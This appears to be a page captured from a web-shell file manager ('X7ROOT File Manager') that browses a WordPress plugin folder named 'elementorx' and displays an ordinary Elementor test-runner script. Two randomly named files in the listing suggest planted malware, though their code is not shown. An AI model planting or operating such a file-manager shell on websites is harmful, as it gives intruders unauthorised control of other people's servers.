X7ROOT File Manager
Current Path:
/home/freights/public_html/wp-content/plugins/elementorx
home
/
freights
/
public_html
/
wp-content
/
plugins
/
elementorx
/
??
..
??
CONTRIBUTING.md
(4.73 KB)
??
app
??
assets
??
changelog.txt
(324.28 KB)
??
core
??
data
??
elementor.php
(3.68 KB)
??
eslint-local-rules.js
(200 B)
??
he606m0b
(9.03 KB)
??
includes
??
license.txt
(34.32 KB)
??
modules
??
olz3o3l9
(9.03 KB)
??
readme.txt
(29.93 KB)
??
run-on-linux.js
(1.11 KB)
??
scripts
??
vendor
??
vendor_prefixed
Editing: run-on-linux.js
const { spawn, exec } = require( 'child_process' ); const packageJson = require( './package.json' ); function isDockerExist() { return new Promise( ( resolve ) => { exec( 'docker -v', ( error ) => { resolve( ! error ); } ); } ); } async function run( tag ) { const playwrightVersion = packageJson.devDependencies[ '@playwright/test' ]; const workingDir = process.cwd(); const command = 'docker run'; const options = [ '--rm', '--network host', `--volume ${ workingDir }:/work`, '--workdir /work/', '--interactive', process.env.CI ? '' : '--tty', ]; const image = `mcr.microsoft.com/playwright:v${ playwrightVersion.replace( '^', '' ) }-jammy`; const commandToRun = `/bin/bash -c "npm run test:playwright -- --grep="${ tag }""`; spawn( `${ command } ${ options.join( ' ' ) } ${ image } ${ commandToRun }`, { stdio: 'inherit', stderr: 'inherit', shell: true, } ); } ( async () => { if ( ! await isDockerExist() ) { // eslint-disable-next-line no-console console.error( 'Docker is not installed, please install it first.' ); process.exit( 1 ); } await run( process.argv.slice( 2 ) ); } )();
Upload File
Create Folder